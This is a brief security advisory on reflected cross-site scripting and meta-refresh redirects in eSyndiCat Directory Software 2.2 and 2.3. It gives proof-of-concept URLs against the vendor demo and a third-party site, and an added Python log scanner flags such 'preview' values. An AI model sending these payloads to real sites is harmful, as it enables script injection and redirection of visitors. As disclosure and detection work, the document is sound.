eSyndiCat Directory Software ( preview= ) version 2.2 and 2.3 - Cross-Site Scripting ( XSS ) & Redirect

http://www.esyndicat.com

30 - 01 - 2011

Avram Marius ( d3v1l )

http://twitter.com/securityshell - http://security-sh3ll.blogspot.com

--------------------------------------------------------------------------

Poc: 1 XSS & Redirect on v.2.3

http://www.esyndicat.com/demo/?preview="><script>alert('XSS')</script>
http://www.esyndicat.com/demo/?preview="><meta http-equiv="Refresh" content="0;url=http://www.google.com/"> ""

--------------------------------------------------------------------------

Poc: 2 XSS & Redirect on v.2.2

http://ekedai.net/date/2008/08/?preview="><script>alert('XSS')</script>
http://ekedai.net/date/2008/08/?preview="><meta http-equiv="Refresh" content="0;url=http://www.google.com/"> ""

--------------------------------------------------------------------------
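
Added example, not part of the original advisory: a log check that flags requests whose preview parameter decodes to a value containing HTML metacharacters, as both PoC URLs above do. The combined log format, the sample entries and the names decode_fully, suspicious_preview and scan are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Characters that let a reflected value close an attribute or open a tag.
HTML_META = re.compile(r"[\"'<>]")
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.*?) HTTP/[\d.]+"')

# Constructed sample entries (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Jan/2011:10:00:00 +0000] "GET /demo/?preview='
    '%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.1" 200 5120',
    '192.0.2.11 - - [30/Jan/2011:10:00:05 +0000] "GET /demo/?preview='
    '%2522%253E%253Cmeta%2520http-equiv%253D%2522Refresh%2522 HTTP/1.1" 200 5120',
    '192.0.2.12 - - [30/Jan/2011:10:00:09 +0000] "GET /demo/?preview=default'
    ' HTTP/1.1" 200 5120',
]

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is seen in the clear."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_preview(log_line):
    """Return the decoded `preview` value if it has HTML metacharacters, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    query = urlsplit(match.group(1)).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = decode_fully(value)
        if name.lower() == "preview" and HTML_META.search(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged entry."""
    hits = ((n, suspicious_preview(line)) for n, line in enumerate(lines, 1))
    return [(n, value) for n, value in hits if value is not None]

if __name__ == "__main__":
    for line_number, value in scan(SAMPLE_LOG):
        print(f"line {line_number}: preview={value!r}")
```

A check like this only surfaces attempts; the fix belongs in the application, which should HTML-encode the parameter wherever it is written into the page.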